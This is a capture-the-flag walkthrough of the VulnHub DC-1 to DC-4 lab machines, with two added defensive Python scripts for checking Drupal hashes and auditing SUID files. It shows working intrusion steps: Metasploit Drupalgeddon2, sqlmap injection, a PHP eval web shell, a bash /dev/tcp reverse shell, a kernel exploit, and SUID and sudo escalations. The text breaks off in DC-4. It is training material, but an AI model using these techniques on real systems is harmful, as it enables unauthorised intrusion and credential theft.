VulnHub DC

Preface

VulnHub DC target series
https://www.vulnhub.com/series/dc,199/

DC1

vulnhub dc1

https://www.vulnhub.com/entry/dc-1,292/

Environment

Kali: 192.168.1.17
Target: 192.168.1.10

Information gathering

nmap -p- --min-rate 10000 192.168.1.10 -oA nmap/port

nmap -sT -sC -sV -O -p22,80,111 192.168.1.10 -oA nmap/detail

  1. 22/tcp: OpenSSH 6.0p1 (Debian)
  2. 80/tcp: Apache 2.2.22 + Drupal 7 CMS
  3. 111/tcp: rpcbind 2-4 (RPC service)
  4. OS: Linux 3.2-3.16 (Debian)
  5. Web application: Drupal 7 (robots.txt lists 36 disallowed directories)

Web information

gobuster dir -u http://192.168.1.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html
dirsearch -u http://192.168.1.10 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt

[07:32:54] 404 - 237B - /_vti_bin/shtml.dll
[07:32:54] 404 - 245B - /_vti_bin/_vti_aut/author.dll
[07:32:56] 404 - 244B - /_vti_bin/_vti_adm/admin.dll
[07:33:23] 403 - 2KB - /Admin
[07:33:23] 403 - 2KB - /admin
[07:33:23] 404 - 230B - /admin.pl
[07:33:24] 404 - 232B - /admin.cgi
[07:33:25] 403 - 2KB - /ADMIN
[07:33:52] 404 - 234B - /AT-admin.cgi
[07:34:06] 403 - 2KB - /batch
[07:34:22] 404 - 234B - /cachemgr.cgi
[07:34:29] 403 - 239B - /cgi-bin/
[07:35:50] 403 - 237B - /Entries
[07:36:08] 404 - 234B - /favicon.ico
[07:36:56] 301 - 247B - /includes -> http://192.168.1.10/includes/
[07:37:02] 403 - 243B - /install.mysql
[07:37:02] 403 - 243B - /install.pgsql
[07:37:33] 200 - 7KB - /LICENSE
[07:38:05] 301 - 245B - /misc -> http://192.168.1.10/misc/
[07:38:09] 301 - 247B - /modules -> http://192.168.1.10/modules/
[07:39:08] 404 - 231B - /player.swf
[07:39:23] 301 - 248B - /profiles -> http://192.168.1.10/profiles/
[07:39:40] 200 - 2KB - /README
[07:39:58] 200 - 649B - /robots.txt
[07:39:58] 200 - 649B - /robots
[07:39:59] 403 - 236B - /Root
[07:40:08] 301 - 247B - /scripts -> http://192.168.1.10/scripts/
[07:40:12] 403 - 2KB - /Search
[07:40:17] 403 - 238B - /server-status
[07:40:20] 403 - 2KB - /search
[07:40:31] 301 - 245B - /sites -> http://192.168.1.10/sites/
[07:41:13] 301 - 246B - /themes -> http://192.168.1.10/themes/
[07:41:41] 200 - 2KB - /user
[07:41:53] 200 - 2KB - /web.config
[07:42:23] 200 - 60B - /xmlrpc.php

Almost every discovered path returns Forbidden.

Port 80 serves a login form.

Registering an account requires administrator approval:

Thank you for applying for an account. Your account is currently pending approval by the site administrator.
In the meantime, a welcome message with further instructions has been sent to your e-mail address.

http://192.168.1.10/web.config

No credentials are leaked there.

http://192.168.1.10/robots.txt

Same picture as the directory scan: everything is Disallow.

Since the CMS is Drupal 7, query searchsploit:

searchsploit Drupal 7

Look at the text-file exploit first:

This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.

You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).

POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]

Retrieve the form_build_id from the response, and then triggering the exploit with :

POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]

This will display the result of the whoami command.

Patch your systems!
Blaklis

It requires a CSRF token and a valid session cookie, so it cannot be used here.

Getting a shell with MSF

Use msf. The first module does not work; the second does:

use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.1.10
run

Drop into a shell and upgrade it to an interactive TTY:

shell
python -c "import pty;pty.spawn('/bin/bash')"

The first flag is in the current directory:

Every good CMS needs a config file - and so do you.

Changing the password via the database

Find the site configuration file:

/var/www/sites/default/settings.php

It contains flag2 and the database credentials:

/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/

$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);

flag2

Brute force and dictionary attacks aren't the
only ways to gain access (and you WILL need access).
What can you do with these credentials?

Database credentials:

dbuser:R0ck3t

Connect to the database:

mysql -u dbuser -p
show databases;
use drupaldb;
show tables;

+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+

Look at the users table:

select * from users;
uid name pass (Drupal hash) mail created access login status timezone
0 (空) (空) (空) 0 0 0 0 NULL
1 admin $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR admin@example.com 1550581826 1550583852 1550582362 1 Australia/Melbourne
2 Fred $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg fred@example.org 1550581952 1550582225 1550582225 1 Australia/Melbourne
3 xiaowu $S$D4puaXB52KrP78jEppfpK1EGveijF4Orxz8WFH9dvWeOLtQV7xKz xiaowu@xiaowu.com 1770380910 0 0 0 Australia/Melbourne
4 manyanj $S$DzFcHeb2E0eZLs1U8iDPBFocRdstDV/KR3SRvxymw47sKaZfDGiE 1975347148@qq.com 1770381951 0 0 0 Australia/Melbourne

Try changing the admin password.

Following this article:

http://drupalchina.cn/node/2128

A precomputed Drupal 7 hash for the password 123456:

$S$DZ8aQ1ocXL2XLgKaC3q.zP4xPGU.DIEHr91QiFrze7WLE08IS.4d

update users set pass="$S$DZ8aQ1ocXL2XLgKaC3q.zP4xPGU.DIEHr91QiFrze7WLE08IS.4d" where name="admin";
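
The hash written into the users table follows Drupal 7's $S$ format: the literal "$S$", one cost character, an 8-character salt, then a custom base-64 encoding of a chained SHA-512, the whole thing cut to 55 characters. The Python below reimplements that scheme so a defender can check whether a stored hash corresponds to a candidate password, for example to confirm after an incident that an admin hash was swapped for one of a trivial password. It is an added example, not code from the writeup or from Drupal itself; the function names are mine, and the algorithm follows Drupal 7's includes/password.inc.

```python
import hashlib
import hmac
import os
from typing import Optional

# Drupal 7's base-64 alphabet (includes/password.inc, _password_itoa64()).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55      # DRUPAL_HASH_LENGTH: stored hashes are cut to 55 chars
SETTING_LENGTH = 12   # "$S$" + cost char + 8-char salt


def _password_base64_encode(data: bytes) -> str:
    """Drupal's (phpass-style) base64: little-endian 3-byte groups, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_crypt(password: str, setting: str) -> Optional[str]:
    """Recompute a $S$ hash from its first 12 characters (the 'setting').

    The cost character is an index into ITOA64 giving log2(iterations):
    'D' -> 15 -> 2**15 = 32768 chained SHA-512 rounds after the initial one.
    """
    setting = setting[:SETTING_LENGTH]
    if len(setting) != SETTING_LENGTH or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 0:
        return None
    salt = setting[4:12]
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _password_base64_encode(digest))[:HASH_LENGTH]


def drupal7_hash(password: str, count_log2: int = 15, salt: Optional[str] = None) -> str:
    """Create a new hash as user_hash_password() would (random salt unless one is given)."""
    if salt is None:
        salt = _password_base64_encode(os.urandom(6))[:8]
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + salt)


def drupal7_verify(password: str, stored: str) -> bool:
    """True when `password` reproduces `stored`; only the $S$ (SHA-512) type is handled."""
    if not stored.startswith("$S$"):
        return False
    computed = drupal7_crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    # The hash written into the users table above; the writeup logs in as admin:123456 afterwards.
    PAGE_HASH = "$S$DZ8aQ1ocXL2XLgKaC3q.zP4xPGU.DIEHr91QiFrze7WLE08IS.4d"
    print("cost 2**%d, salt %r" % (ITOA64.find(PAGE_HASH[3]), PAGE_HASH[4:12]))
    print("123456 matches page hash:", drupal7_verify("123456", PAGE_HASH))
```

Run stand-alone it reports the cost and salt of the hash above and whether 123456 reproduces it; drupal7_verify() can equally be pointed at any $S$ hash dumped from the users table to check it against a list of passwords the organisation has banned.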

Back on the port 80 site, log in with:

admin:123456

flag3 is found at:

http://192.168.1.10/node/2#overlay-context=node/2

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

Privilege escalation with find

The hint mentions find and PERMS, which suggests a SUID binary.

Back in the shell, search for SUID files:

find / -perm -4000 2>/dev/null

And find is indeed among them:

find . -exec /bin/sh -p \; -quit

id still shows uid 33, but the effective uid is root (whoami reports root), so /root is readable and the final flag can be read:

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
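
Reading the flag with find -exec works only because find carries the SUID bit, which is exactly the condition a host audit should catch. The following Python is an added example (my code, not part of the writeup): it classifies SUID files against an allowlist and flags the two patterns this series relies on, an unexpected SUID-root binary such as find here, and a group- or world-writable SUID file like the test.sh that turns up on DC-4 further down. The allowlist and the sample entries are constructed; scan_filesystem() is the live equivalent of the find command above.

```python
import os
import stat
from typing import Dict, Iterable, List, Tuple

# Constructed allowlist of SUID-root programs a Debian host is expected to carry.
# Not an authoritative baseline: build yours from a known-good install.
SUID_ALLOWLIST = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo",
}
SCRIPT_SUFFIXES = (".sh", ".py", ".pl", ".rb")


def classify(path: str, mode: int, uid: int, allowlist=SUID_ALLOWLIST) -> List[str]:
    """Findings for one file from its st_mode and st_uid; empty if nothing is wrong."""
    findings = []
    if not mode & stat.S_ISUID:
        return findings                                   # not SUID, nothing to say
    if uid == 0 and path not in allowlist:
        findings.append("unexpected SUID-root binary")    # e.g. find on DC-1
    if mode & stat.S_IWOTH:
        findings.append("SUID file is world-writable")    # e.g. test.sh on DC-4
    elif mode & stat.S_IWGRP:
        findings.append("SUID file is group-writable")
    if path.endswith(SCRIPT_SUFFIXES):
        findings.append("SUID bit on a script (Linux ignores it, but it signals misconfiguration)")
    return findings


def audit(entries: Iterable[Tuple[str, int, int]]) -> Dict[str, List[str]]:
    """Map path -> findings for every entry that has at least one finding."""
    report = {}
    for path, mode, uid in entries:
        findings = classify(path, mode, uid)
        if findings:
            report[path] = findings
    return report


def scan_filesystem(root: str = "/") -> Iterable[Tuple[str, int, int]]:
    """Live equivalent of `find / -perm -4000`: yield (path, st_mode, st_uid) of SUID regular files."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode, st.st_uid


# Constructed sample modelled on what the DC machines expose (modes as st_mode values).
SAMPLE = [
    ("/bin/su", 0o104755, 0),
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/find", 0o104755, 0),          # DC-1: find is SUID root
    ("/home/jim/test.sh", 0o104777, 1001),   # DC-4: -rwsrwxrwx, owned by jim (uid assumed)
    ("/usr/bin/vim", 0o100755, 0),           # no SUID bit: ignored
]

if __name__ == "__main__":
    entries = scan_filesystem() if os.environ.get("SUID_AUDIT_LIVE") else SAMPLE
    for path, findings in sorted(audit(entries).items()):
        print(f"{path}: {'; '.join(findings)}")
```

Without SUID_AUDIT_LIVE set it audits the constructed sample; with it set it walks the real filesystem. Comparing two runs taken at different times is the cheapest way to notice that a binary such as find has gained the SUID bit.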

According to the author there are 5 flags, so one is still missing.

There is also a user named flag4, and flag4 is in that user's home directory:

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?

Flag summary

flag1

Every good CMS needs a config file - and so do you.

flag2

Brute force and dictionary attacks aren't the
only ways to gain access (and you WILL need access).
What can you do with these credentials?

flag3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

flag4

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?

flag5

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

DC2

vulnhub dc2

https://www.vulnhub.com/entry/dc-2,311/

Environment

Kali: 192.168.1.17
Target: 192.168.1.10

hosts file entry:

192.168.1.10 dc-2

Information gathering

nmap -p- --min-rate 10000 192.168.1.10 -oA nmap/port

nmap -sT -sC -sV -O -p80,7744 192.168.1.10 -oA nmap/detail

Target host information

  • OS: Linux 3.2 - 4.14 (Debian)
  • MAC address: Oracle VirtualBox VM

Open ports and services

  1. 80/tcp - HTTP
    • Apache 2.4.10 (Debian)
    • WordPress 4.7.10
    • Title: DC-2 – Just another WordPress site
  2. 7744/tcp - SSH
    • OpenSSH 6.7p1 (Debian 8)

Web probing

gobuster dir -u http://192.168.1.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50

No exploitable paths are found.

Port 80 is a WordPress blog; nmap identifies it as WordPress 4.7.10.

flag1 is on the site:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

cewl (Custom Word List generator) builds a wordlist by crawling a target site and extracting the words and phrases found there.

Generating wordlists

Password list:

cewl http://dc-2/ -w pass.txt

User list

WPScan is a security scanner dedicated to WordPress, used to find vulnerabilities in WordPress sites.

wpscan --url dc-2 -e u

Three users:

admin
jerry
tom

Brute-forcing the users

wpscan --url http://dc-2 -U user.txt -P pass.txt

jerry and tom are cracked:

| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

Logging in to the dashboard

flag2 is in jerry's dashboard:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

There is no template editor in the dashboard to use for command execution, so try SSH.

SSH login

hydra -L user.txt -P pass.txt 192.168.1.10 ssh -s 7744

tom:parturient

Login works.

flag3 is in the current directory, but many commands are unavailable: this is a restricted shell.

Escaping rbash

https://blog.csdn.net/2301_79518550/article/details/147287764

List the available commands:

compgen -c

vi is available.

Run vi (or vim)
Type :set shell=/bin/bash and then :shell
Or simply :!/bin/bash
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Success.

flag3

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

Following the hint, su jerry works, and jerry's home directory contains

flag4

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!


No more hints; look for a privilege escalation path.

Privilege escalation via sudo git

sudo -l shows git can be run as root.

# 1. Create a symlink to /bin/sh
ln -s /bin/sh git-x

# 2. Point git's exec path at the current directory
sudo git --exec-path=. x

Success.

The fifth flag is in /root:

 __    __     _ _       _                    _ 
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Flag summary

flag1

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

flag2

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

flag3

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

flag4

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

flag5

 __    __     _ _       _                    _ 
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

DC3.2

vulnhub DC 3.2

https://www.vulnhub.com/entry/dc-32,312/

Target IP

192.168.1.16

Information gathering

nmap -sn 192.168.1.0/24
nmap -p- --min-rate 10000 192.168.1.16 -oN nmap/port.txt
nmap -sT -sC -sV -O -p80 192.168.1.16 -oN nmap/detail.txt
nmap --script=vuln -p80 192.168.1.16 -oN nmap/vuln.txt

PORT   STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:18:12:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop

Only port 80 is open.

Framework: Joomla CMS

OS: Linux 3.2 - 4.14

gobuster dir -u http://192.168.1.16/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
dirsearch -u http://192.168.1.16 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt

200 - /README.txt
200 - /LICENSE.txt
200 - /htaccess.txt
200 - /configuration.php
301 - /administrator -> http://192.168.1.16/administrator/
301 - /bin -> http://192.168.1.16/bin/
301 - /cache -> http://192.168.1.16/cache/
301 - /components -> http://192.168.1.16/components/
301 - /images -> http://192.168.1.16/images/
301 - /includes -> http://192.168.1.16/includes/
200 - /index.php
301 - /language -> http://192.168.1.16/language/
301 - /layouts -> http://192.168.1.16/layouts/
301 - /libraries -> http://192.168.1.16/libraries/
301 - /media -> http://192.168.1.16/media/
301 - /modules -> http://192.168.1.16/modules/
301 - /plugins -> http://192.168.1.16/plugins/
403 - /server-status
301 - /templates -> http://192.168.1.16/templates/
301 - /tmp -> http://192.168.1.16/tmp/

README.txt reveals the CMS version: Joomla! 3.7.

SQL injection

searchsploit lists a SQL injection exploit for this version:

searchsploit Joomla! 3.7

sqlmap -u "http://192.168.1.16/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" \
-p "list[fullordering]" \
--risk=3 --level=5 \
--random-agent \
--dbs

Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(6745,CONCAT(0x2e,0x717a787071,(SELECT (ELT(6745=6745,1))),0x716b706271),6543))

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8817 FROM (SELECT(SLEEP(5)))QwmI)
---
[07:21:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[07:21:57] [INFO] fetching database names
[07:21:57] [INFO] retrieved: 'information_schema'
[07:21:57] [INFO] retrieved: 'joomladb'
[07:21:57] [INFO] retrieved: 'mysql'
[07:21:57] [INFO] retrieved: 'performance_schema'
[07:21:57] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

sqlmap -u "http://192.168.1.16/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" \
-p "list[fullordering]" \
--risk=3 --level=5 \
--random-agent \
-D joomladb \
--tables

+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+

Dump the #__users table:

+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

Cracking with john

john --format=bcrypt hash.hash --wordlist=/usr/share/wordlists/rockyou.txt

admin:snoopy

Port 22 is closed; port 80 has a login form.

Logging in

Nothing useful there. The directory scan found /administrator, another login form.

Login succeeds.

Getting a shell via templates

The template editor lets you write PHP into a template file, which gives code execution.

Write a one-line web shell:

eval($_POST['cmd']);

Connect with AntSword and get a reverse shell.

Privilege escalation via the distribution version

uname -a

cat /etc/issue

cat /proc/version

lsb_release -a

www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
www-data@DC-3:/var/www/html$ searchsploit linux kernel 4.4.0
searchsploit linux kernel 4.4.0
searchsploit: command not found
www-data@DC-3:/var/www/html$ cat /etc/issue
cat /etc/issue
Ubuntu 16.04 LTS \n \l

www-data@DC-3:/var/www/html$ cat /proc/version
cat /proc/version
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
www-data@DC-3:/var/www/html$ lsb_release
lsb_release
No LSB modules are available.
www-data@DC-3:/var/www/html$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
www-data@DC-3:/var/www/html$

Tried 42276, 44298 and 43418; all failed. A writeup online used 39772.

Following the steps in the exploit's documentation:

Kali:
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip -O ./39772.zip
python -m http.server 80

Target:
wget http://192.168.1.17/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

Root obtained; the flag is in /root:

 __        __   _ _   ____                   _ _ _ _ 
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

DC4

vulnhub dc 4

https://www.vulnhub.com/entry/dc-4,313/

Target IP

192.168.1.11

Information gathering

nmap -p- --min-rate 10000 192.168.1.11 -oN nmap/port.txt

nmap -sT -sC -sV -O -p22,80 192.168.1.11 -oN nmap/detail.txt

  • OS: Linux 3.2 - 4.14 (Debian)
  • Ports: 22 (OpenSSH 7.4p1), 80 (nginx 1.15.10)

gobuster dir -u http://192.168.1.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50

[08:11:16] 301 - 170B - /css -> http://192.168.1.11/css/
[08:11:23] 301 - 170B - /images -> http://192.168.1.11/images/

Nothing useful.

Brute force

Port 80 is a login form; the page source reveals nothing and SQL injection attempts fail.

Brute force seems to be the only route left.

Burp shows the credentials are sent in plaintext, but the response does not reveal whether the username or the password was wrong.

Brute-forcing succeeds.

Credentials:

admin:happy

RCE in the admin panel

A command execution panel.

Intercepting the request shows the parameter carries the command to run:

radio=ls+-l&submit=Run

Reverse shell

curl -X POST http://192.168.1.11/command.php \
-H "Cookie: PHPSESSID=u8qlergatfe52bkor6q6iatcv1" \
-d "radio=bash -c 'bash -i >%26 /dev/tcp/192.168.1.17/6666 0>%261'&submit=Run"

Credentials from mail

find / -perm -4000 2>/dev/null

Among the SUID files, /home/jim/test.sh stands out: a SUID script owned by jim with mode 777.

-rwsrwxrwx 1 jim jim 174 Apr  6  2019 /home/jim/test.sh

# 1. Overwrite test.sh
echo '#!/bin/bash' > /home/jim/test.sh
echo '/bin/bash' >> /home/jim/test.sh

# 2. Run it
/home/jim/test.sh

That fails (the SUID bit has no effect on an interpreted script) and we are still www-data, but jim's home directory holds old-passwords.bak, a backup password list.

Save it and brute-force SSH with it:

hydra -l jim -P pass.txt ssh://192.168.1.11

Credentials:

jim:jibril04

jim's home directory also has a readable mbox:

From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

A single mail, which tells us:

  • Mail server: Exim 4.89
  • From: root@dc-4
  • To: jim@dc-4
  • Date: 6 April 2019
  • Body: just a test message

Look for where mail is stored.

/var/spool/mail holds jim's mail:

From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles
